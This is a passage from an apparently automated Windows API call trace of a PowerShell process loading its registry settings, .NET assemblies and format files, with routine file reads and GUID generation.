lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad188 | out: phkResult=0x1ad188*=0x318) returned 0x0 [0073.802] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad10c, lpData=0x0, lpcbData=0x1ad108*=0x0 | out: lpType=0x1ad10c*=0x1, lpData=0x0, lpcbData=0x1ad108*=0x56) returned 0x0 [0073.802] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cd150 [0073.802] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0dc, lpData=0x1b3cd150, lpcbData=0x1ad0d8*=0x56 | out: lpType=0x1ad0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad0d8*=0x56) returned 0x0 [0073.802] CoTaskMemFree (pv=0x1b3cd150) [0073.802] RegCloseKey (hKey=0x318) returned 0x0 [0073.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0073.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0073.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0073.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0073.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0073.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0073.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0073.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0073.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0073.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0073.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0073.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0073.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0073.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0073.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0073.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0073.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0073.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.902] VirtualQuery (in: lpAddress=0x1abc20, lpBuffer=0x1acae0, dwLength=0x30 | out: lpBuffer=0x1acae0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.902] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x428ea442, Data2=0x9e43, Data3=0x4475, Data4=([0]=0xb7, [1]=0xcc, [2]=0xcd, [3]=0xd, [4]=0x5c, [5]=0x36, [6]=0x70, [7]=0xd6))) returned 0x0 [0073.902] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1a335634, Data2=0xf3f, Data3=0x475c, Data4=([0]=0xb1, [1]=0xb7, [2]=0xa3, [3]=0xcf, [4]=0x21, [5]=0x0, [6]=0xcf, [7]=0x4d))) returned 0x0 [0073.903] VirtualQuery (in: lpAddress=0x1abdd0, lpBuffer=0x1acc90, dwLength=0x30 | out: lpBuffer=0x1acc90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.903] VirtualQuery (in: lpAddress=0x1abdd0, lpBuffer=0x1acc90, dwLength=0x30 | out: lpBuffer=0x1acc90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.903] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xa8ce94c9, Data2=0x6046, Data3=0x4f10, Data4=([0]=0x80, [1]=0xb5, [2]=0x9c, [3]=0x70, [4]=0xf7, [5]=0x19, [6]=0x86, [7]=0xa9))) returned 0x0 [0073.904] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x393b97d8, Data2=0xde9d, Data3=0x4b0e, Data4=([0]=0x80, [1]=0xfc, [2]=0xb8, [3]=0x1f, [4]=0x9c, [5]=0x18, [6]=0xca, [7]=0xf3))) returned 0x0 [0073.904] VirtualQuery (in: lpAddress=0x1ac020, lpBuffer=0x1acee0, dwLength=0x30 | out: lpBuffer=0x1acee0*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.904] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.905] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.905] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xabd599ca, Data2=0xbfb7, Data3=0x4f40, Data4=([0]=0x94, [1]=0x47, [2]=0xa4, [3]=0xe8, [4]=0xc5, [5]=0x73, [6]=0x41, [7]=0xdb))) returned 0x0 [0073.905] VirtualQuery (in: lpAddress=0x1ac020, lpBuffer=0x1acee0, dwLength=0x30 | out: lpBuffer=0x1acee0*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.905] VirtualQuery (in: lpAddress=0x1abe40, lpBuffer=0x1acd00, dwLength=0x30 | out: lpBuffer=0x1acd00*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.906] VirtualQuery (in: lpAddress=0x1ab690, lpBuffer=0x1ac550, dwLength=0x30 | out: lpBuffer=0x1ac550*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.906] VirtualQuery (in: lpAddress=0x1ab690, lpBuffer=0x1ac550, dwLength=0x30 | out: lpBuffer=0x1ac550*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.906] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xae9c87e2, Data2=0xf2ff, Data3=0x4789, Data4=([0]=0x9b, [1]=0x1a, [2]=0x7b, [3]=0xc3, [4]=0x79, [5]=0x43, [6]=0xbe, [7]=0xab))) returned 0x0 [0073.906] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x93c39ab2, Data2=0xa9b6, Data3=0x48a1, Data4=([0]=0xb5, [1]=0x35, [2]=0x1e, [3]=0x27, [4]=0x5d, [5]=0x5c, [6]=0x5c, [7]=0xb3))) returned 0x0 [0073.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.907] SetErrorMode (uMode=0x1) returned 0x1 [0073.907] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318 [0073.907] GetFileType (hFile=0x318) returned 0x1 [0073.907] SetErrorMode (uMode=0x1) returned 0x1 [0073.907] GetFileType (hFile=0x318) returned 0x1 [0073.907] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.908] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.909] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.909] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.910] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.911] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.911] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.911] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.912] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.912] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.912] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.913] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.913] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.913] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.914] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.914] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.915] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.916] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0xbce, lpOverlapped=0x0) returned 1 [0073.916] ReadFile (in: hFile=0x318, lpBuffer=0x35262e6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x35262e6*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.916] ReadFile (in: hFile=0x318, lpBuffer=0x3526bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3526bb0*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.916] CloseHandle (hObject=0x318) returned 1 [0073.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.916] SetErrorMode (uMode=0x1) returned 0x1 [0073.917] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0073.917] SetErrorMode (uMode=0x1) returned 0x1 [0073.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.917] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad188 | out: phkResult=0x1ad188*=0x318) returned 0x0 [0073.917] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad10c, lpData=0x0, lpcbData=0x1ad108*=0x0 | out: lpType=0x1ad10c*=0x1, lpData=0x0, lpcbData=0x1ad108*=0x56) returned 0x0 [0073.917] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cd000 [0073.917] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0dc, lpData=0x1b3cd000, lpcbData=0x1ad0d8*=0x56 | out: lpType=0x1ad0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad0d8*=0x56) returned 0x0 [0073.917] CoTaskMemFree (pv=0x1b3cd000) [0073.917] RegCloseKey (hKey=0x318) returned 0x0 [0073.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.923] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x834002b5, Data2=0xb67e, Data3=0x4dfd, Data4=([0]=0x84, [1]=0xf8, [2]=0xd1, [3]=0xf6, [4]=0xb4, [5]=0x3e, [6]=0x6e, [7]=0xe))) returned 0x0 [0073.923] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xb2863ca, Data2=0x4411, Data3=0x46f5, Data4=([0]=0x9e, [1]=0xa9, [2]=0xc4, [3]=0x91, [4]=0xee, [5]=0x3e, [6]=0xc, [7]=0x6c))) returned 0x0 [0073.923] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xbe52d625, Data2=0x1472, Data3=0x4703, Data4=([0]=0xac, [1]=0x4e, [2]=0xa1, [3]=0x30, [4]=0x0, [5]=0x1f, [6]=0xcf, [7]=0x7f))) returned 0x0 [0073.924] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xe9c3d895, Data2=0x559c, Data3=0x4a23, Data4=([0]=0x9e, [1]=0x4c, [2]=0x19, [3]=0x70, [4]=0x44, [5]=0x41, [6]=0xe, [7]=0x7f))) returned 0x0 [0073.924] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x16134ebd, Data2=0x670, Data3=0x42b7, Data4=([0]=0x86, [1]=0x14, [2]=0x55, [3]=0x20, [4]=0x91, [5]=0xff, [6]=0x15, [7]=0x35))) returned 0x0 [0073.924] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x130ff713, Data2=0x8dbe, Data3=0x4017, Data4=([0]=0xaa, [1]=0x12, 